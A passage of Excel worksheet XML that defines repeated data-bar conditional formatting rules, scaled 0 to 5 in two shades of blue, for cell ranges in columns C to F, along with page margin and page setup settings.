          <x14:id>{276D75FF-118B-4788-B4FB-FECA7CF22A9E}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C81:E89">
    <cfRule type="dataBar" priority="32">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{2AD8B511-40B1-4012-A435-3FA43E60A5BD}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F81:F91">
    <cfRule type="dataBar" priority="31">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{7FD54C1D-0B1A-4C29-B3EB-C55A871A06C6}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F45">
    <cfRule type="dataBar" priority="30">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{018475BF-FA23-43F0-942D-EFE17B4F860E}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C45:E45">
    <cfRule type="dataBar" priority="29">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{E093D6E3-AE13-42C0-88B6-DCB57717E563}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F31">
    <cfRule type="dataBar" priority="28">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{F5DA5838-4876-4F08-AADD-6EE614369892}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C31:E31">
    <cfRule type="dataBar" priority="27">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{BCE88D15-F5F1-4FE8-8BB6-1DA3B9C9D36C}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F32">
    <cfRule type="dataBar" priority="26">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{0BE00D61-14E5-4B38-A757-C3DF60668A50}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C32:E32">
    <cfRule type="dataBar" priority="25">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{2323C704-7490-4BB5-8625-3C13399C11D8}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C92:E92">
    <cfRule type="dataBar" priority="24">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{51DC4BD7-7039-43FC-8B2C-E21CA778F180}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F92">
    <cfRule type="dataBar" priority="23">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{54D717AA-8818-4B02-8C83-00BEF7294B3A}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C93:E93">
    <cfRule type="dataBar" priority="22">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{C9DBA87F-6B7E-4E55-8409-2C566705AEF8}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F93">
    <cfRule type="dataBar" priority="21">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{ADA371F9-3533-44E9-8A10-A5BBF314EA61}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C94:E94">
    <cfRule type="dataBar" priority="20">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{2ACF10F8-C5C5-4FDC-BEE2-1BDFD1A91B07}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F94">
    <cfRule type="dataBar" priority="19">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{E878D11A-B256-4591-9632-B2BB7A46FCBF}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C95:E95">
    <cfRule type="dataBar" priority="18">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{FCDC9171-7D8E-4699-A31D-E46438211B49}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F95">
    <cfRule type="dataBar" priority="17">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{86B9D43D-787D-4ED5-BB86-43FC1CED62B5}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C96:E96">
    <cfRule type="dataBar" priority="16">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{0BABE90C-9E31-42D4-A83F-9FBF987905CE}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F96">
    <cfRule type="dataBar" priority="15">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{29AF288C-7497-4E50-A90D-702064551817}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C97:E97">
    <cfRule type="dataBar" priority="14">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{05810F08-D696-43C8-8E7F-7AAFD7820A79}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F97">
    <cfRule type="dataBar" priority="13">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{1046C76A-5CCE-4BA0-BA72-1E32A5404BE4}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C98:E98">
    <cfRule type="dataBar" priority="12">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{9E703173-FD1C-49D1-B1D3-E84ADB379664}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F98">
    <cfRule type="dataBar" priority="11">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{11B547AC-954F-4B03-B1C5-4868980407EF}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C99:E99">
    <cfRule type="dataBar" priority="10">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{D1CF6177-62EF-4388-9E1E-F665E2625163}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F99">
    <cfRule type="dataBar" priority="9">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{43C68606-AF7C-4819-8129-31FA2073F874}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C100:E100">
    <cfRule type="dataBar" priority="8">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{5EECF62D-61BE-4B44-9F5D-351D2652E97E}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F100">
    <cfRule type="dataBar" priority="7">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{71C4A432-AF4B-476D-BD50-ADF6A1555951}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C101:E101">
    <cfRule type="dataBar" priority="6">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{1ABB6B78-DF6F-4CFE-867F-FBE36CDAA92A}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F101">
    <cfRule type="dataBar" priority="5">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{9DDEDC39-4DC5-4B93-838C-97AA16A4FE71}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C102:E102">
    <cfRule type="dataBar" priority="4">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{CDA1D47B-B38D-4A16-9829-B6D0422F3EC5}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F102">
    <cfRule type="dataBar" priority="3">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{7AE861F1-CC0A-4C4C-A23B-12DDE14AC3C4}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="C103:E115">
    <cfRule type="dataBar" priority="2">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF76AAD4"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{C0564927-435D-4431-84E3-EE29454E3E39}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="F103:F115">
    <cfRule type="dataBar" priority="1">
      <dataBar>
        <cfvo type="num" val="0"/>
        <cfvo type="num" val="5"/>
        <color rgb="FF2C578C"/>
      </dataBar>
      <extLst>
        <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{B025F937-C7B1-47D3-B67F-A62EFF666E3E}">
          <x14:id>{C0337D63-46A3-4DD3-8CD2-36FDFD19FCC0}</x14:id>
        </ext>
      </extLst>
    </cfRule>
  </conditionalFormatting>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait"/>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1917242-52DD-4328-B524-26DACB7DE176}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F116:F162 F2:F30 F46:F80 F33:F44</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{276D75FF-118B-4788-B4FB-FECA7CF22A9E}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C90:E91 C57:E80 C2:E30 C46:E55 C33:E44 C116:E1048576</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{2AD8B511-40B1-4012-A435-3FA43E60A5BD}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C81:E89</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{7FD54C1D-0B1A-4C29-B3EB-C55A871A06C6}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F81:F91</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{018475BF-FA23-43F0-942D-EFE17B4F860E}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F45</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{E093D6E3-AE13-42C0-88B6-DCB57717E563}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C45:E45</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{F5DA5838-4876-4F08-AADD-6EE614369892}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F31</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{BCE88D15-F5F1-4FE8-8BB6-1DA3B9C9D36C}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C31:E31</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{0BE00D61-14E5-4B38-A757-C3DF60668A50}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F32</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{2323C704-7490-4BB5-8625-3C13399C11D8}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C32:E32</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{51DC4BD7-7039-43FC-8B2C-E21CA778F180}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C92:E92</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{54D717AA-8818-4B02-8C83-00BEF7294B3A}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F92</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{C9DBA87F-6B7E-4E55-8409-2C566705AEF8}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C93:E93</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{ADA371F9-3533-44E9-8A10-A5BBF314EA61}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F93</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{2ACF10F8-C5C5-4FDC-BEE2-1BDFD1A91B07}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C94:E94</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{E878D11A-B256-4591-9632-B2BB7A46FCBF}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F94</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{FCDC9171-7D8E-4699-A31D-E46438211B49}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C95:E95</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{86B9D43D-787D-4ED5-BB86-43FC1CED62B5}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F95</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{0BABE90C-9E31-42D4-A83F-9FBF987905CE}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>C96:E96</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{29AF288C-7497-4E50-A90D-702064551817}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0" direction="leftToRight">
              <x14:cfvo type="num">
                <xm:f>0</xm:f>
              </x14:cfvo>
              <x14:cfvo type="num">
                <xm:f>5</xm:f>
              </x14:cfvo>
              <x14:negativeFillColor rgb="FFFF0000"/>
              <x14:axisColor rgb="FF000000"/>
            </x14:dataBar>
          </x14:cfRule>
          <xm:sqref>F96</xm:sqref>
        </x14:conditionalFormatting>
        <x14:conditionalFormatting xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">
          <x14:cfRule type="dataBar" id="{05810F08-D696-43C8-8E7F-7AAFD7820A79}">
            <x14:dataBar minLength="0" maxLength="100" gradient="0">
